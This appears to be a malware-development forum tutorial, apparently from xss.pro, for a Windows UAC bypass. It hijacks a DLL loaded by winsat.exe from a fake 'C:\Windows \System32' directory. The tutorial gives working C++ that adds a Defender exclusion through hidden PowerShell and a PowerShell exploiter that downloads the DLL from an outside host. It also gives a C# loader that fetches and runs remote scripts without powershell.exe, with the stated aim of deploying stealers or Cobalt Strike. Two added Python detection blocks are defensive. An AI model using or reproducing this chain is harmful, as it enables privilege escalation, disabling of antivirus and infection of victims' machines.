Hi xss.pro users ,
The goal of this tutorial is to gain experience writing malware and red teaming tools with programming languages. It is aimed at newbies who want to raise their skills, but if you are a professional you are welcome too.
This tutorial will be translated to Russian for people who can't read English.
- Requirements:
  - Visual Studio
  - basic C++
  - basic PowerShell knowledge
  - basic C#
- First of all, how does winsat work?
By default winsat starts as Administrator, and the first thing it does after starting is load the DLLs it requires; without these DLLs winsat will not run at all. This is what we take advantage of: by replacing one of the original DLLs with our own DLL, that DLL also runs as Administrator when winsat runs, so we can use it to launch our target process as Administrator. For example we can launch powershell.exe with a command that adds a specific directory to the Windows Defender exclusions list.
Then we can download our malicious exe to the directory we added to the exclusions list, whatever it is: Cobalt Strike, a stealer, etc.
- Now let's get into the coding section.
Winsat is located in "c:\windows\system32\winsat.exe". Did you guess the problem? Yes, it is located in "c:\windows\system32\", which means we cannot replace the original DLL, because that would require Administrator privileges. This is where the mock directory comes in and fixes the problem.
What is a mock directory?
A mock directory is a directory whose name includes a space before the backslash \
Normal directory : c:\windows\system32\winsat.exe
Mock directory : c:\windows \system32\winsat.exe
To create a mock directory using PowerShell, we use this New-Item command:
New-Item '\\?\C:\Windows \System32' -ItemType Directory
At this point everything is fine, and I guess now you understand how it works.
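A defender-side hunt for the mock directories just described, added here as an example and not part of the original post: it walks a directory tree and reports every directory whose name keeps a trailing space or dot (which Win32 path normalisation would otherwise strip) and whether it shadows a real sibling such as Windows next to "Windows ". The temp-dir layout is constructed; on a live Windows host the root would be passed with the \\?\ prefix, which is assumed here to be passed through unchanged by Python's os.walk.

```python
import os
import tempfile

def is_mock_name(name):
    # Win32 path normalisation strips trailing spaces and dots from each
    # component, so such a name can only be created or opened via the \\?\ prefix.
    return name not in (".", "..") and name != name.rstrip(" .")

def find_mock_dirs(root):
    """Walk root and return (path, shadows_real) for every mock-named directory.

    shadows_real is True when a sibling with the normalised name exists, i.e. the
    mock directory mimics a real one. Assumption: on Windows the caller passes
    root as '\\\\?\\C:\\' so the walk itself is not normalised.
    """
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            if is_mock_name(d):
                sibling = os.path.join(dirpath, d.rstrip(" ."))
                hits.append((os.path.join(dirpath, d), os.path.isdir(sibling)))
    return sorted(hits)

def demo():
    # Constructed layout in a temporary directory reproducing the tutorial's
    # 'Windows \\System32' copy beside the real 'Windows\\System32'.
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "Windows", "System32"))
    os.makedirs(os.path.join(base, "Windows ", "System32"))
    os.makedirs(os.path.join(base, "Users", "bob"))
    return [(os.path.relpath(p, base), shadows) for p, shadows in find_mock_dirs(base)]

if __name__ == "__main__":
    print(demo())  # [('Windows ', True)]
```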
Now download the attachment and extract the zip file; the password is: xss.pro
Open the Visual Studio project and go to "version": this is the name of the DLL we will infect.
You can't use a normal DLL project from Visual Studio, because winsat requires a specific signature.
Now here we go: in the entry point DllMain we will put our malicious code.
The goal of this DLL is to launch an elevated PowerShell with Administrator privileges and then add a specific directory to the Windows Defender exclusions list.
This can be done with the WinExec function! I know what you are thinking: why not use CreateProcess instead of WinExec? For some reason it won't work for me, but you can still try.
WinExec takes two arguments: the first is the command line, and the second is the show option. To show the PowerShell window set the last argument to 1, and to hide it set the last argument to 0.
OK, and the PowerShell command:
Command line:
cmd.exe /c powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command $cankja = [System.Environment]::GetFolderPath('CommonApplicationData');$fcankja= $cankja; Add-MpPreference -ExclusionPath $fcankja;
Let me explain the PowerShell code for you.
[System.Environment]::GetFolderPath('CommonApplicationData')
It gets the "c:\programdata" directory.
Add-MpPreference -ExclusionPath $folderpath
It adds the ProgramData directory to the Windows Defender exclusions list, so Windows Defender will skip all files in that directory while scanning. You can change this to your own code, for example disabling Windows Defender with the command below.
Set-MpPreference -DisableRealtimeMonitoring $true
The final code looks like this:
C++:
#include "pch.h"
#include "prxdll.h"

BOOL APIENTRY DllMain(
    const HINSTANCE instance,
    const DWORD reason,
    const PVOID reserved)
{
    switch (reason) {
    case DLL_PROCESS_ATTACH:
        // Runs once when winsat.exe loads this version.dll replacement
        WinExec("cmd.exe /c powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command $cankja = [System.Environment]::GetFolderPath('CommonApplicationData');$fcankja= $cankja; Add-MpPreference -ExclusionPath $fcankja; ", 0);
        DisableThreadLibraryCalls(instance);
        return prx_attach(instance);
    case DLL_PROCESS_DETACH:
        prx_detach(reserved);
        break;
    }
    return TRUE;
}
Now compile the project, and pay attention: the architecture should be the same as the target's version.
- Now let's get into the PowerShell section.
This script will be the exploiter, which will create the new mock directory, copy winsat.exe from the original directory into the new directory, and finally download the DLL and start the winsat.exe process in hidden mode. In this code I added an optional step before the exploit: I check the installed AV and only exploit if Windows Defender is the only AV installed; if another AV is installed it will skip the exploit.
Don't forget: the main goal is to get Administrator privileges.
PowerShell:
$computername = $env:computername;
$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername;
$detected = 0;
foreach ($AntiVirusProduct in $AntiVirusProducts)
{
    if ($AntiVirusProduct.displayName -ne "Windows Defender")
    {
        # no exploit normal run
        $detected = 1;
    }
}
if ($detected -eq 0)
{
    New-Item '\\?\C:\Windows \System32' -ItemType Directory
    Set-Location -Path '\\?\C:\Windows \System32'
    copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
    Invoke-WebRequest -Uri 'http://th30c0der.com/versionx64.dll' -OutFile 'version.dll'
    Start-Process -WindowStyle hidden -Filepath 'C:\windows \System32\winSAT.exe'
}
Change th30c0der.com to your domain or IP; it can be localhost.
Now we have finished everything, but how can we deliver this PowerShell script? For me, I will use .NET 4.8 and the "PowerShell without powershell.exe" technique to execute the PowerShell script without using powershell.exe; this will bypass the restriction if the target system has blocked powershell.exe.
To create the ps1 loader project, create a new C# Windows Forms app
and choose the .NET 4.8 version.
Go to Manage NuGet Packages
and search for the PowerShell cake package; this will download System.Management.Automation.dll.
Now open Program.cs
and remove the default lines that show the GUI window.
The code will look like this:
C#:
using System;
using System.Management.Automation.Runspaces;

namespace PS1Loader
{
    internal static class Program
    {
        static void Main()
        {
        }
    }
}
Now let's initialize the runspace configuration, add our PowerShell command and invoke it.
The final code will look like this:
C#:
using System;
using System.Management.Automation.Runspaces;

namespace PS1Loader
{
    internal static class Program
    {
        static void Main()
        {
            Runspace runspaceKhamisla = RunspaceFactory.CreateRunspace(RunspaceConfiguration.Create());
            runspaceKhamisla.Open();
            Pipeline pipeline = runspaceKhamisla.CreatePipeline();
            pipeline.Commands.AddScript("$ps1url = '';iex(New-Object Net.WebClient).DownloadString($ps1url)");
            pipeline.Invoke();
        }
    }
}
Please make sure you change the variable names and the namespace before you compile it.
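Detection logic covering both the PowerShell exploiter script and the C# loader above, added here as an example and not part of the original post: it applies a few rules to constructed process-creation and image-load events (the field names mirror Sysmon-style telemetry, but the sample events are made up). It flags winsat.exe running from anywhere but its canonical path, a path component with a trailing space or dot (a mock directory), a shell spawned by winsat.exe, Defender exclusion or real-time-monitoring changes on a command line, and System.Management.Automation.dll being loaded into a process that is not a PowerShell host, which is how a loader built with the runspace API shows up.

```python
import re

CANONICAL_WINSAT = r"c:\windows\system32\winsat.exe"
PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# The two Defender changes this tutorial relies on.
DEFENDER_TAMPER = re.compile(r"Add-MpPreference\s+-ExclusionPath|Set-MpPreference\s+-DisableRealtimeMonitoring", re.I)
# A space or dot right before a backslash: a component Win32 normalisation would have stripped.
MOCK_COMPONENT = re.compile(r"[ .]\\")

def leaf(path):
    """Last component of a Windows path, lower-cased (no os.path, so it works on any OS)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Apply the rules to a list of event dicts and return (rule, detail) findings."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        if ev["Event"] == "ProcessCreate":
            if leaf(image) == "winsat.exe" and image.lower() != CANONICAL_WINSAT:
                findings.append(("winsat_noncanonical_path", image))
            if MOCK_COMPONENT.search(image):
                findings.append(("mock_directory_in_path", image))
            if leaf(ev.get("ParentImage", "")) == "winsat.exe" and leaf(image) in {"cmd.exe", "powershell.exe"}:
                findings.append(("winsat_spawned_shell", image))
            if DEFENDER_TAMPER.search(ev.get("CommandLine", "")):
                findings.append(("defender_tamper", ev["CommandLine"]))
        elif ev["Event"] == "ImageLoad":
            if leaf(ev["ImageLoaded"]).startswith("system.management.automation") and leaf(image) not in PS_HOSTS:
                findings.append(("ps_engine_in_foreign_host", image))
    return findings

# Constructed sample events modelled on the tutorial's chain; not real telemetry.
SAMPLE_EVENTS = [
    {"Event": "ProcessCreate", "Image": r"C:\Windows \System32\winSAT.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows \System32\winSAT.exe"},
    {"Event": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows \System32\winSAT.exe",
     "CommandLine": "cmd.exe /c powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass "
                    "-Command $p = [System.Environment]::GetFolderPath('CommonApplicationData'); Add-MpPreference -ExclusionPath $p;"},
    {"Event": "ProcessCreate", "Image": r"C:\Windows\System32\winsat.exe",  # benign run
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "winsat disk"},
    {"Event": "ImageLoad", "Image": r"C:\Users\bob\Desktop\PS1Loader.exe",
     "ImageLoaded": r"C:\Users\bob\Desktop\System.Management.Automation.dll"},
    {"Event": "ImageLoad", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.dll"},  # shortened
]
```

Running `analyze(SAMPLE_EVENTS)` yields one finding per rule, in event order, while the benign winsat run and the real powershell.exe host produce nothing.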
All done, we finish here. See you in a new tutorial.
POC Video.